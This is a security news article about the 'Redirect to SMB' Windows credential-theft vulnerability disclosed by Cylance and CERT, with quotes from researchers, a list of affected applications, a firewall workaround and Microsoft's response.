New Windows Vulnerability at Large, Security Vendor Says
Security developer Cylance recently uncovered a new technique for stealing log-in credentials from any Windows PC, tablet, or server – including those running previews of the not-yet-released Windows 10.
Dubbed Redirect to SMB, Carnegie Mellon University CERT disclosed the vulnerability after working privately with vendors for the past six weeks to help them mitigate the potential for damage. With Redirect to SMB, attackers hijack communications with legitimate web servers using man in the middle attacks, then sending them to malicious server message block (SMB) servers that pass out the victim's user name, domain, and hashed password, wrote Brian Wallace, software engineer, security researcher, malware analyzer, and investigator of advanced threat actors in a Cylance blog on April 13.
The vulnerability is virulent and fast, security pundits warn. On a Windows 8.1 laptop, for example, at least 50 different HTTP connections were made after a restart; within five minutes, most could be hijacked by a network-local attacker to force SMB authentication to a malicious server, Rapid7’s HD Moore, chief research officer, told Enterprise Technology via email. Connection sources ranged from OEM update checks to weather and news applications, he added.
"This is a novel attack that can be easily abused to significantly increase the exploitability of Windows client systems communicating on untrusted or compromised networks. While tools like KARMA, Metasploit and Responder.py depend on the user to make a SMB connection back to the attacker, the Cylance research improves on the attack by abusing how HTTP redirects are handled by callers of the URLMon API," said Moore. "The Cylance research shows that instead of waiting for the user to open their browser or manually connect to a network share, an attacker can look for automated HTTP requests sent by background applications and redirect these to file:// URLs, triggering a SMB connection and automatic authentication. Given how many applications a typical laptop or tablet has running in the background, this can drastically speed up SMB capture and relay attacks against Windows-based laptops and tablets connecting to insecure wireless networks."
Cylance discovered Redirect to SMB while seeking ways to abuse a chat client feature for image previews, Wallace said. The team tested many applications, eventually uncovering 31 vulnerable applications, which it shared with CERT on Feb. 27, 2015. Programs include: Adobe Reader; Apple QuickTime and Apple Software Update; Microsoft Internet Explorer, Windows Media Player, Excel 2010, and Microsoft Baseline Security Analyzer; Symantec Norton Security Scan, AVG Free; BitDefender Free; Comodo Antivirus; .NET Reflector; Maltego CE; Box Sync; Team Viewer; Github for Windows; PyCharm; IntelliJ IDEA; PHP Storm, and JDK 8u31’s installer, according to Cylance
"Redirect to SMB is most likely to be used in targeted attacks by advanced actors because attackers must have control over some component of a victim’s network traffic," wrote Wallace. "Malicious ads could also be crafted that would force authentication attempts from IE users while hiding malicious behavior from those displaying the advertising. Less sophisticated attackers could launch Redirect to SMB on shared Wi-Fi access points at locations such as coffee shops from any computer, including mobile devices. We successfully tested this attack on a home network using a Nexus 7 loaded with all required tools."
Some developers never fully addressed the vulnerability, which dates back to a 1997 discovery by Aaron Spangler, said Wallace. Microsoft, for example, has not yet shipped a patch for Redirect to SMB, he said. One workaround: Block outbound traffic from TCP 139 and TCP 445 at either the endpoint firewall or the network gateway’s firewall, if using a trusted network, said Wallace.
But the threat is not as big as Cylance purports, Microsoft told KRRO News.
"Several factors would need to converge for a 'man-in-the-middle' cyberattack to occur. Our guidance was updated in a Security Research and Defense blog in 2009, to help address potential threats of this nature," said Microsoft in an emailed statement. "There are also features in Windows, such as Extended Protection for Authentication, which enhances existing defenses for handling network connection credentials."